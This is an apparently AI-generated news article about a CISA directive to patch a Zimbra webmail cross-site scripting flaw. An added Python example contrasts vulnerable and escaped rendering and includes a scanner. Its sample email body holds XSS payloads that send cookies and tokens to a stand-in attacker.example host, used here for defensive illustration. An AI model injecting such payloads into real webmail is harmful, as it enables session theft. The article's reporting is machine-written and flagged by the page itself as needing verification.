
CISA Orders Federal Agencies to Patch Critical Zimbra Vulnerability Amid Active Exploitation

Tech & Science · AI-Generated & Algorithmically Scored

AI-generated from multiple sources. Verify before acting on this reporting.

WASHINGTON (AP) — The Cybersecurity and Infrastructure Security Agency has issued an emergency directive ordering federal agencies to patch a critical vulnerability in Zimbra Collaboration Suite servers within 72 hours, warning that the flaw is being actively exploited by Russian cyberespionage groups.

More than 10,000 Zimbra servers worldwide remain exposed to a cross-site scripting attack exploiting CVE-2025-48700, which allows unauthenticated attackers to inject malicious JavaScript that runs inside victims' webmail sessions. Because the injected script executes with the privileges of the logged-in user, the vulnerability exposes sensitive mailbox data without the attacker needing any credentials. CISA identified the flaw as actively exploited and elevated the urgency of the patching order to prevent data breaches across government networks.

The Shadowserver Foundation, a nonprofit that scans the internet for exposed and vulnerable services, and Synacor, the company that owns Zimbra, confirmed the widespread nature of the exposure. Their data indicates that the vulnerable servers are concentrated primarily in Asia and Europe, though the threat is global. The attack targets unpatched installations of the collaboration software, which is widely used by enterprises and government entities for email and calendar management.

The vulnerability has been linked to APT28 and APT29, two advanced persistent threat groups associated with Russian state-sponsored cyberespionage. These groups have a history of targeting government and corporate infrastructure to steal intelligence and disrupt operations. The current campaign appears to leverage the unpatched Zimbra servers to establish footholds in targeted networks.

Zimbra, owned by Synacor, has released a patch to address the flaw, but adoption remains low across the global server landscape. The delay in patching leaves organizations vulnerable to data theft and potential network compromise. CISA’s directive mandates immediate action, requiring federal agencies to verify patch deployment and report compliance within the three-day window.

The attack method involves injecting malicious scripts into email sessions; the scripts execute in the victim's browser when users open their inboxes. The technique does not break authentication so much as borrow it: the script runs inside the victim's already-authenticated webmail session, so the attacker needs no credentials of their own and can read mail, exfiltrate session tokens, or use the foothold to stage further attacks. Because the exploit requires nothing more than getting a script in front of a logged-in user, it has become a favorite among threat actors seeking quick access to high-value targets.
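To make the mechanism concrete, here is an added example that is not code from Zimbra, Synacor, or the article: a toy webmail renderer in its vulnerable and hardened forms, plus a small triage scanner that defenders can run over exported HTML mail bodies. The message bodies, the hostname attacker.example, and the function names are constructed for illustration and are not the real CVE-2025-48700 trigger, whose details the article does not give.

```python
"""Stored XSS in webmail: vulnerable vs. hardened rendering, plus a triage scan.

Added example, not Zimbra code. MALICIOUS_BODY is a constructed payload that
shows the shape of an injected script; it is not the real CVE-2025-48700 exploit.
"""
import html
from html.parser import HTMLParser

# Constructed sample: an HTML email carrying an event-handler payload and an
# inline script, both aimed at a hypothetical attacker.example collector.
MALICIOUS_BODY = (
    "<p>Quarterly report attached.</p>"
    "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">"
    "<script>new Image().src='https://attacker.example/?t='+localStorage.token</script>"
)
# Constructed benign sample with ordinary markup and a normal https link.
BENIGN_BODY = (
    "<p>Hi team, the <b>meeting</b> moved to 3pm. "
    "See <a href='https://intranet.example/cal'>calendar</a>.</p>"
)


def render_message_vulnerable(body: str) -> str:
    """Interpolates the raw HTML body into the inbox view. Any script or
    event handler in the message runs in the reader's authenticated session,
    which is exactly the stored-XSS condition the article describes."""
    return f'<div class="message-body">{body}</div>'


def render_message_hardened(body: str) -> str:
    """Escapes the body so markup is displayed as text, never executed.
    A client that must render rich HTML mail would instead pass the body
    through an allowlist sanitizer; escaping is the simplest safe default."""
    return f'<div class="message-body">{html.escape(body, quote=True)}</div>'


class InjectionScanner(HTMLParser):
    """Walks an HTML mail body and records the constructs an injected payload
    needs: <script> elements, on* event-handler attributes, and javascript:
    URLs in href/src/action attributes."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        for name, value in attrs:
            name = name.lower()
            if name.startswith("on"):
                self.findings.append(f"event handler {name} on <{tag}>")
            if name in ("href", "src", "action") and value:
                # Normalise case and embedded whitespace before checking the scheme.
                scheme = value.strip().lower().replace(" ", "")
                if scheme.startswith("javascript:"):
                    self.findings.append(f"javascript: URL in {name} on <{tag}>")


def scan_for_injection(body: str) -> list[str]:
    """Returns a list of injection indicators found in an HTML mail body;
    an empty list means nothing suspicious was seen."""
    scanner = InjectionScanner()
    scanner.feed(body)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    print("vulnerable render contains <script>:",
          "<script" in render_message_vulnerable(MALICIOUS_BODY))
    print("hardened render contains <script>:",
          "<script" in render_message_hardened(MALICIOUS_BODY))
    print("findings in malicious body:", scan_for_injection(MALICIOUS_BODY))
    print("findings in benign body:", scan_for_injection(BENIGN_BODY))
```

The scanner is a triage aid, not a sanitizer: it flags the handful of constructs a stored-XSS payload must contain so that mailbox exports can be sorted for a closer look, and it will miss obfuscated variants. The hardened renderer shows the other half of the fix, keeping untrusted markup from ever reaching the browser as live HTML, which is the property a patched client must guarantee regardless of how the injection reaches the mailbox.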

Cybersecurity experts warn that the widespread nature of the vulnerability could lead to significant data breaches if not addressed promptly. The concentration of vulnerable servers in Asia and Europe raises concerns about regional infrastructure stability and the potential for coordinated attacks on critical sectors.

As of now, it remains unclear how many organizations outside the federal government have successfully patched their systems. The ongoing exploitation suggests that threat actors are actively scanning for unpatched servers, increasing the risk of compromise for any entity running vulnerable versions of Zimbra. Federal agencies are under strict deadlines to mitigate the threat, but the global scale of the vulnerability presents a significant challenge for coordinated defense efforts.